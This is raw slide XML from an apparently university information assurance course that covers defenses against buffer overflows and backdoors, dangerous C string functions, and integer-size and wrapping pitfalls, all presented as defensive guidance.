    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362722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85800" y="609600"/>
            <a:ext cx="6705600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Buffer Overflow – Minimum Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171011" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="1563688"/>
            <a:ext cx="7331075"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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="571500" indent="-228600">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a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>At a minimum, you must keep your systems patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vendors frequently release patches for various programs that have buffer overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94160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t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173059" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="76200"/>
            <a:ext cx="67818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800"/>
              <a:t>Buffer Overflow Defenses – Technical Approaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173065" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8534400" cy="4401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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> Non-executable stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>No instructions can be retrieved from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>May break some applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Still very useful on sensitive systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Configuration option on Solaris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Compiler checks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>wformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730951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09600" y="381000"/>
            <a:ext cx="6705600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Buffer Overflow Defenses – Better Programs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175111" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1600200"/>
            <a:ext cx="7559675" cy="338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75000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> Avoid Programming Mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="75000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Know what buffer overflows are and how to avoid them!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="75000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Awareness/Training for developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="75000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Code reviews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="75000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Automated code checking tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144905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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1524000"/>
            <a:ext cx="6553200" cy="2400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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="628650" indent="-285750">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1943100">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2171700">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2628900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3086100" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3543300" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="40005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2000" dirty="0"/>
              <a:t>These slides come from the University of Alabama in Huntsville, Information Assurance course </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Dr. Akhtar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Lodgher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from Texas A&amp;M University- San Antonio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Slides are modified by the instructor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42909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t>Backdoor Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117768" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="822325" y="1563688"/>
            <a:ext cx="7559675"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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-228600">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a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove extra junk from critical servers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> client?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you need X-Windows?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strictly control outgoing traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many organizations just worry about incoming traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You must carefully filter both directions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198750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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dangerous Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1524000"/>
            <a:ext cx="7086600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unbounded memory copies such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Bounded memory copy functions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368289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a:t>Miscalculations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Sometimes when performing pointer arithmetic, miscalculations can be made as to how much space is left in a buffer. This can allow for malicious attackers to sometimes write outside the bounds of the destination buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Subtle and difficult to detect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160076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t>Integer manipulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="5486400" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Signed and unsigned integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Different sized integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Integer wrapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379553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a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="8001000" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Usually 32 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Signed unless explicitly qualified with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t> keyword</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>16-bit signed             16-bit unsigned	32-bit signed	32-bit unsigned	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>Min 	-32768	                     0		-2147483648	0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>Max 32767	                     65535		 2147483647	4294967295</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>64-bit signed			64-bit unsigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> min -9223372036854775808  		      0		                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>max	  9223372036854775807		18446744073709551615	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="601332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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Different Sized Integers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1447800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Integers of different sizes are sometimes used during calculation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Implications of this could include truncated values (32 bit -&gt; 16 bit), sign issues (32 bit -&gt; 16 bit or vice versa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
